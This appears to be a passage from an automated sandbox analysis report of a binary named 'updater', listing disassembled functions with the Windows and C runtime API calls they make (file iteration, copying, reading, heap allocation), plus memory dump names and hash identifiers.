                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: b3456a567b5ad2947e4a4420ad3c012ab4c8eecd648aec3ac7464743df77aff6
                                    • Instruction ID: e1d5cc39195573c3090b5ac450193ec7b4dac24851f6eb7113a6f8b75878ac86
                                    • Opcode Fuzzy Hash: b3456a567b5ad2947e4a4420ad3c012ab4c8eecd648aec3ac7464743df77aff6
                                    • Instruction Fuzzy Hash: 65E065B3A0663245E725667F7C4876A15C98BB1239F25022BE4248A1FEEE7485C25191
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 013B2F8F
                                      • Part of subcall function 013F60E6: FindNextFileW.KERNEL32(?,?,?,013B2C78,?,?,?,?,?,?,?,?,00000000), ref: 013F60EF
                                    • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 013B2FA1
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_fs_directory_iterator_advance@8$FileFindNext
                                    • String ID:
                                    • API String ID: 478157137-0
                                    • Opcode ID: 2b0e29ceb34528c5d78f59bbb15759e657e3eea70d7cfd01a994688803db12ea
                                    • Instruction ID: 0dff2d8fc68881dd012f73e7c09aabcb5774b3216c345e8da78037d97e071452
                                    • Opcode Fuzzy Hash: 2b0e29ceb34528c5d78f59bbb15759e657e3eea70d7cfd01a994688803db12ea
                                    • Instruction Fuzzy Hash: 51E086311081067AEF016A1ADD858EF7B7AAFE125C7508124FF0596E51F731F8759790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CopyFileW.KERNEL32 ref: 013F5D77
                                    • GetLastError.KERNEL32(?,?,?,013F6070,?,?,00000000,4350CDAC), ref: 013F5D8D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CopyErrorFileLast
                                    • String ID:
                                    • API String ID: 374144340-0
                                    • Opcode ID: 16f63db432ac8c8fd4007c63c02e78847a849f262fdff744bae6db5526b1d271
                                    • Instruction ID: cc59ee62270cd2ad08a2c33e437902933eba2c86052104c818762fd7780eb0ec
                                    • Opcode Fuzzy Hash: 16f63db432ac8c8fd4007c63c02e78847a849f262fdff744bae6db5526b1d271
                                    • Instruction Fuzzy Hash: 8AE04F70604149FFEB018BA5D808F6E7FA99B1524AF088058B94485194DA74D5419770
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01411169
                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 01411174
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                    • String ID:
                                    • API String ID: 1660781231-0
                                    • Opcode ID: 014cca33ebe9859562d65797585212fa86ffbd5e7bacd1e1bf1f81cfdba14264
                                    • Instruction ID: 2ed30d78d03d8fce545a8e40ca9a2664995bb5039aa8baf165b3d083fd5f37d8
                                    • Opcode Fuzzy Hash: 014cca33ebe9859562d65797585212fa86ffbd5e7bacd1e1bf1f81cfdba14264
                                    • Instruction Fuzzy Hash: CED022B1A89702040E1423FEA800C9F77A1693AEF0370038FCB20C9AFEEFF18000A152
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 013D08C1: EnterCriticalSection.KERNEL32(?,00000000,?,013D04FE,01454914,013D0630,00000007,?,?,?,?,013D0374,?), ref: 013D08C9
                                      • Part of subcall function 013D08C1: GetCurrentThreadId.KERNEL32(?,013D04FE,01454914,013D0630,00000007,?,?,?,?,013D0374,?), ref: 013D08CF
                                    • _strlen.LIBCMT ref: 013EC011
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalCurrentEnterSectionThread_strlen
                                    • String ID:
                                    • API String ID: 1501162294-0
                                    • Opcode ID: cdeb58162763d7036b6a70d86c2b80afe500b046ecb662082dc1784ceb19b43d
                                    • Instruction ID: 03b1d58f7cc758e3c4deb375fa74f64509669f7a78f7c534e83998a5e5a34556
                                    • Opcode Fuzzy Hash: cdeb58162763d7036b6a70d86c2b80afe500b046ecb662082dc1784ceb19b43d
                                    • Instruction Fuzzy Hash: 2271C73290032AEBDF16DF6DD8846BEBBF4EF55228F104029E914A7285D735D945CF90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __fread_nolock
                                    • String ID:
                                    • API String ID: 2638373210-0
                                    • Opcode ID: e983aa1a03757e7a0493d8ecfb2d83940b11ad08b4fb9b4f7b2f1c4c000d0c7c
                                    • Instruction ID: 0d92707a47afa0ed1c85957eb812a22c3dc6646b0a634fffe5a981917bcb639d
                                    • Opcode Fuzzy Hash: e983aa1a03757e7a0493d8ecfb2d83940b11ad08b4fb9b4f7b2f1c4c000d0c7c
                                    • Instruction Fuzzy Hash: CE21C57194530AEBDB10EFA9D880ADEBBB9FF64A04F10046FF505A7640E7715A098B91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Deallocate
                                    • String ID:
                                    • API String ID: 1075933841-0
                                    • Opcode ID: 06d55f0090a365e7cf1a2ee48323d961df7079bd84090b7898b360519a70f18c
                                    • Instruction ID: 735c433c4ad761427b41e14d879a47c1cacf83153dfe4e0e1e33022d650fa3ee
                                    • Opcode Fuzzy Hash: 06d55f0090a365e7cf1a2ee48323d961df7079bd84090b7898b360519a70f18c
                                    • Instruction Fuzzy Hash: 2511D5B1900345AFC715DF69884099EBBBEEF95208F2444ADE4149B342D631DE02CBB1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4cd69b30f2fed49e15bc4d09106a77f9a31e43624eb26d19c9be718efe1f3845
                                    • Instruction ID: d227fdb2d451c16124b6644400fcd7319dcd4bf27520d3d7436e0bcb6bc417e2
                                    • Opcode Fuzzy Hash: 4cd69b30f2fed49e15bc4d09106a77f9a31e43624eb26d19c9be718efe1f3845
                                    • Instruction Fuzzy Hash: 5701F5373102119FAF26CD2DEC8095B379BABC46A07244122FB04DB2ADDA34D80E8790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 013B7BB4
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileRead
                                    • String ID:
                                    • API String ID: 2738559852-0
                                    • Opcode ID: 34f27f55e1a2b42e1c59b039d87829a6a8cd5bfcd8e78ac014244e0db300e8e5
                                    • Instruction ID: e3d80d5056c40cfbf240af51386af50627b6ac7081f321d65368ff2a24b71337
                                    • Opcode Fuzzy Hash: 34f27f55e1a2b42e1c59b039d87829a6a8cd5bfcd8e78ac014244e0db300e8e5
                                    • Instruction Fuzzy Hash: 24113031600515BFDB15DF29C844ADABBA9FF44664F008119EA5897A90EB30F960DFD0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::exception::exception.LIBCMT ref: 013B128D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::exception::exception
                                    • String ID:
                                    • API String ID: 2807920213-0
                                    • Opcode ID: 539c9f1cf03f102ca9c522d3a911c2c9057d06df3dce8d1a654d2a3a357df755
                                    • Instruction ID: 725d957743975c1b91e5f2adbc14fb14503847ec3c58bd1c13149eb6c28008e4
                                    • Opcode Fuzzy Hash: 539c9f1cf03f102ca9c522d3a911c2c9057d06df3dce8d1a654d2a3a357df755
                                    • Instruction Fuzzy Hash: F4F07D7240021E67C718BFAAFC11CDE7B9C9F60A68740013EFA1887650EB31ED0583D4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __wsopen_s
                                    • String ID:
                                    • API String ID: 3347428461-0
                                    • Opcode ID: 292da03f80fd80fd00c05cea0df78b6dbe00427e473a65a05a15826fa6fae68b
                                    • Instruction ID: d0fd7b6a81dbf4c929c6043c367ef2fce3ad0c324035c27c78dd6d8770d44da4
                                    • Opcode Fuzzy Hash: 292da03f80fd80fd00c05cea0df78b6dbe00427e473a65a05a15826fa6fae68b
                                    • Instruction Fuzzy Hash: 55113971A0420AAFCF05DF58E94099F7BF9EF48304F15406AF809EB351D630EA11CBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 014200C6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0142063D,00000001,00000364,00000005,000000FF,?,?,01413CA9,01420149,?,?,0141DA9C), ref: 01420107
                                    • _free.LIBCMT ref: 01428E57
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: deb1c0a4bcfdfdda9140dc86cca0d54468f7f47de27033a236988258eda4d6b1
                                    • Instruction ID: c0334492b4000e91e5e382ff5b07ad137ba247f9f9e7dd736483f5b3dcff50f1
                                    • Opcode Fuzzy Hash: deb1c0a4bcfdfdda9140dc86cca0d54468f7f47de27033a236988258eda4d6b1
                                    • Instruction Fuzzy Hash: 4E0122B2600327ABC3318FA9D88099EFBD8EB147B0F50062EE545B76D0E77068518BA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __alldvrm
                                    • String ID:
                                    • API String ID: 65215352-0
                                    • Opcode ID: 0460f07f0d12403b60dde8756b98344bfb9af85e1b97c0701680bafdc2b72f66
                                    • Instruction ID: 9f2de801ad83023b396b84c18e93278d38af0bbbdffbb57237e83b350aa6e528
                                    • Opcode Fuzzy Hash: 0460f07f0d12403b60dde8756b98344bfb9af85e1b97c0701680bafdc2b72f66
                                    • Instruction Fuzzy Hash: 2C01D872910204BFEF24DF65C845BEEB7ECFBA1229F11855EE406AB214D270AA04CB54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7ca8e9e532a719df361b6c9cb492d982898333f57b032a82f79c94fe4b91144b
                                    • Instruction ID: fd51ed430a17f36aef439a5aec6663aed34ef0e4265179784ea18a8fd61788c0
                                    • Opcode Fuzzy Hash: 7ca8e9e532a719df361b6c9cb492d982898333f57b032a82f79c94fe4b91144b
                                    • Instruction Fuzzy Hash: F8F028326006216EE6217E3BDC00B6B36B8AF72B70F14071BE868932F4DB34D446C6A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 5c2e12cd716acd2ee769000e0b8b80a9b3a91afc9e7156e1fe6f41a9e9f94f89
                                    • Instruction ID: 758a70d237afd73fc9add3a0c642e919adf80ab6774a7e2290f408484876c132
                                    • Opcode Fuzzy Hash: 5c2e12cd716acd2ee769000e0b8b80a9b3a91afc9e7156e1fe6f41a9e9f94f89
                                    • Instruction Fuzzy Hash: 89014472C00169BFCF01AFE98C019FF7FB5AF28250F544166F914E21A0E6318A60DBD1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0142063D,00000001,00000364,00000005,000000FF,?,?,01413CA9,01420149,?,?,0141DA9C), ref: 01420107
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 89568740781d3c69253b888ba92ba3887611cc57bcd92f872f7ea4f2034fc23f
                                    • Instruction ID: 9d1723b38d8ed2e2b09392e47caa8f8019866e824908e1b8fedef5c0f4e95664
                                    • Opcode Fuzzy Hash: 89568740781d3c69253b888ba92ba3887611cc57bcd92f872f7ea4f2034fc23f
                                    • Instruction Fuzzy Hash: 9CF0247250023466BB315A3AAC44B6BBBC8DF51670B588017F908A72B9DA70D4C282A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::exception::exception.LIBCMT ref: 013B128D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::exception::exception
                                    • String ID:
                                    • API String ID: 2807920213-0
                                    • Opcode ID: 9a178c65e21abc146fcf6542ea49f1370340a625f573892f941509e5a7993f30
                                    • Instruction ID: 079790bc8affafb604f4d2a15ef4a91dcaa108dd5332f896a4bf7bebce8f17f0
                                    • Opcode Fuzzy Hash: 9a178c65e21abc146fcf6542ea49f1370340a625f573892f941509e5a7993f30
                                    • Instruction Fuzzy Hash: 4CF0F0B580430E72CB146AEAEC0489A7B5C8A206A8700413AEF188A9F0EB71D955C6D0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 013B2BAE
                                      • Part of subcall function 013F60E6: FindNextFileW.KERNEL32(?,?,?,013B2C78,?,?,?,?,?,?,?,?,00000000), ref: 013F60EF
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileFindNext___std_fs_directory_iterator_advance@8
                                    • String ID:
                                    • API String ID: 3878998205-0
                                    • Opcode ID: 1e3f53b99c73df3d8f3de25c2ac6dd250ce164a3f3b04e89b11d6b26aa243de7
                                    • Instruction ID: 134b2aff35c5f768e48c096fba61d7167db79c19613a52dd078dae41482fcca3
                                    • Opcode Fuzzy Hash: 1e3f53b99c73df3d8f3de25c2ac6dd250ce164a3f3b04e89b11d6b26aa243de7
                                    • Instruction Fuzzy Hash: 14F0BE312046094AEB28AA1DDD95BFBB7ACAF9031DF000A6D9B52D2840FEA0F840C650
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetProcAddress.KERNEL32(00000000,?,01454064,00000000,?,0141234A,00000004,InitializeCriticalSectionEx,0143BC58,0143BC60,00000000,?,01412109,01454064,00000FA0,00000000), ref: 01412229
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc
                                    • String ID:
                                    • API String ID: 190572456-0
                                    • Opcode ID: bbaa9ba63faa5aa9ffe44d8ce45386eb18232d6f6660b51321385a2b8fac4dd3
                                    • Instruction ID: 2b8dcd0d19a17c1bae38637fd259927a8e4810169b28c321976d096169412da1
                                    • Opcode Fuzzy Hash: bbaa9ba63faa5aa9ffe44d8ce45386eb18232d6f6660b51321385a2b8fac4dd3
                                    • Instruction Fuzzy Hash: 91F08C362002169BAF228FA9A900C9F7BA8AF097207240126EA04D72A8EB71D4208791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,0142838D,00000220,?,?,?,?,?,?,01413E8D,?), ref: 0142258E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 82194d3cedc8a9c0663ab415db81ff5b7eebe544ce88c2c971e16b791c85a9ca
                                    • Instruction ID: 9de3b22ac9ae2fc672270af5d8367e6a8363d28669370aef1a6718c062a39b54
                                    • Opcode Fuzzy Hash: 82194d3cedc8a9c0663ab415db81ff5b7eebe544ce88c2c971e16b791c85a9ca
                                    • Instruction Fuzzy Hash: 46E0EC7114123157E631156A4C20F5B7B489F551B1F854117ED0B962F4DAF4C8C281E5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ___std_fs_copy_file@12.LIBCPMT ref: 013B315D
                                      • Part of subcall function 013B2966: __EH_prolog2.LIBCMT ref: 013B296D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
